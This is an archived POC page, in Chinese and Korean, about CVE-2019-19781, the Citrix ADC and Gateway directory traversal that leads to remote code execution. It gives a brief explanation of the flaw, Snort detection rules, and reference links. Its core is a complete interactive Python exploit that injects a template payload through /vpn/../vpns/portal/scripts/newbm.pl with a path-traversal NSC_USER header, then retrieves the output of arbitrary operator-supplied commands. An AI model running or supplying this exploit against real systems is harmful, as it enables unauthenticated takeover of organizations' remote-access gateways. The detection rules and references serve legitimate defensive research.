POC详情: 3b5dea9ee5162331554bc3f2570cccec615e0821

来源
https://github.com/chihyeonwon/CVE-2019-19781
关联漏洞
标题: Citrix Application Delivery Controller和Citrix Systems Gateway 路径遍历漏洞 (CVE-2019-19781)
描述:Citrix Systems NetScaler Gateway(Citrix Systems Gateway)和Citrix Application Delivery Controller(ADC)都是美国思杰系统(Citrix Systems)公司的产品。Citrix Systems NetScaler Gateway是一套安全的远程接入解决方案。该方案可为管理员提供应用级和数据级管控功能,以实现用户从任何地点远程访问应用和数据。Citrix Application Delivery Controll
描述
RCE, Citirx ADC and Gateway Directory Traversal
介绍
본 글은 CVE-2019-19781에 등재된 Citrix ADC and Gateway Directory Traversal 원격코드 실행 RCE에 대한 글 입니다.
해당 원격코드 실행 취약점은 /vpn 경로 밑의 ../vpns에서 smb.conf 파일에 대한 검증이 적절하게 이루어지지 않아 발생한다.   
시스템 구성정보나 서버 정보를 탈취

1. Citrix
- 1989년 설립된 미국의 다국적 소프트웨어 기업

- 서버, 애플리케이션 및 데스크톱 가상화, 네트워킹, SaaS, 클라우드 컴퓨팅 기술을 제공
- 취약한 Citrix 제품군에서 입력값 검증이 부족하여 발생하는 디렉터리 트래버설 취약점- 입력값에 대한 검증없이 요청 받은 경로를 직접 사용함으로써 발생하는 취약점

- 취약한 버전의 Citrix 제품군의 /vpns/ 경로에 인증 없이 디렉토리를 포함한 제한된 파일에 접근이 가능한 perl 스크립트가 존재

- 해당 perl 스크립트에서 요청 받은 경로를 직접 사용
## path delete
- /../이 포함된 요청과 /vpns/ 디렉터리에 접근하려는 요청을 차단

## POC CODE
```snort

alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt"; flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"/../"; http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)

alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt"; flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"%2E%2E"; http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)
```

```C
#!/usr/bin/env python
import requests
import string
import random
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
print("Found by Mikhail Klyuchnikov")
print("")

if len(sys.argv) < 2:
  print("[-] No URL provided")
  sys.exit(0)

while True:
    try:
      command = input("command > ")

      random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
      print("[+] Adding bookmark", random_xml + ".xml")

      burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
                      random_xml, "NSC_NONCE": "c", "Connection": "close"}
      burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
      r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)

      if r.status_code == 200:
        print("[+] Bookmark added")
      else:
        print("\n[-] Target not vulnerable or something went wrong")
        sys.exit(0)

      burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
                       random_xml, "NSC_NONCE": "c", "Connection": "close"}
      r = requests.get(burp0_url, headers=burp0_headers,verify=False)

      replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
      print("[+] Result of the command: \n")
      print(replaced)

    except KeyboardInterrupt:
            print("Exiting...")
            break
```

  ## 참고

  - https://nvd.nist.gov/vuln/detail/CVE-2019-19781

- https://github.com/mpgn/CVE-2019-19781

- https://github.com/jas502n/CVE-2019-19781

- https://www.cisa.gov/uscert/ncas/alerts/aa20-031a

- https://www.boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35250&queryString=cGFnZT0xJnNvcnRfY29kZT0mc29ydF9jb2RlX25hbWU9JnNlYXJjaF9zb3J0PWRpc3BsYXlfY29udGVudHMmc2VhcmNoX3dvcmQ9Q1ZFLTIwMTktMTk3ODE=

- https://support.citrix.com/article/CTX267027/cve201919781-vulnerability-in-citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance

- https://support.citrix.com/article/CTX276688/citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance-security-update

- https://www.tripwire.com/state-of-security/citrix-netscaler-cve-2019-19781-what-you-need-to-know

- https://www.tenable.com/blog/cve-2019-19781-exploit-scripts-for-remote-code-execution-vulnerability-in-citrix-adc-and

- https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-citrix-adc-and-citrix-gateway-directory-traversal-vulnerability-cve-2019-19781/
文件快照

 [4.0K]  /data/pocs/3b5dea9ee5162331554bc3f2570cccec615e0821
└── [4.6K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。